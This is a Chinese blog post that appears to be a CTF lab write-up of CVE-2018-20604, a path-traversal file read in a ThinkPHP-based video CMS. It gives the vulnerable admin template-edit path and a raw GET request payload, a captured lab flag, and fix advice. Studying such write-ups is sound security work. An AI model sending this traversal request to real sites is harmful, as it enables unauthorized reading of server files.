春秋云镜靶场漏洞复现:CVE-2018-20604 已完成记录审计报告

环境:春秋云境“免费空间”授权实验靶场。历史实例已关闭。

1. 当前可验证信息

项目 内容
CVE CVE-2018-20604
状态 平台记录中标记为已完成,靶场已关闭
Flag flag{d5e29b1e-bfa1-44f5-a15a-71c926326d2b}
产品 雷风影视 CMS / ThinkPHP 3.2.3
入口 admin.php?s=/Template/edit/path/*web*..*..*..*..*1.txt
漏洞类型 路径遍历任意文件读取

2. 漏洞原理、复现与利用链

平台详情页确认该 CMS 的模板编辑路径存在路径遍历。通过编码/特殊路径片段让模板编辑接口读取 Web 根目录之外的文件:

GET /admin.php?s=/Template/edit/path/*web*..*..*..*..*1.txt HTTP/1.1
Host: <雷风影视-CMS-靶场域名>

题目利用链为“模板路径遍历 -> 读取 /flag -> 响应回显”;原始 Flag 回显响应未保存。

3. Flag 获取与验证

flag{d5e29b1e-bfa1-44f5-a15a-71c926326d2b}

修复应规范化模板路径、拒绝路径遍历片段并限制模板进程读取权限。截图已保存到 images 目录并由平台详情页复核。

4. 修复建议

修复后应回归测试编码路径、重复路径片段、绝对路径和不同模板文件名,确认 /flag 等敏感文件不可读。

截图证据

题目详情与已攻克状态

题目状态与 Flag 验证区域

posted @ 2026-08-17 10:08  广东老八  阅读(10)  评论(0)    收藏  举报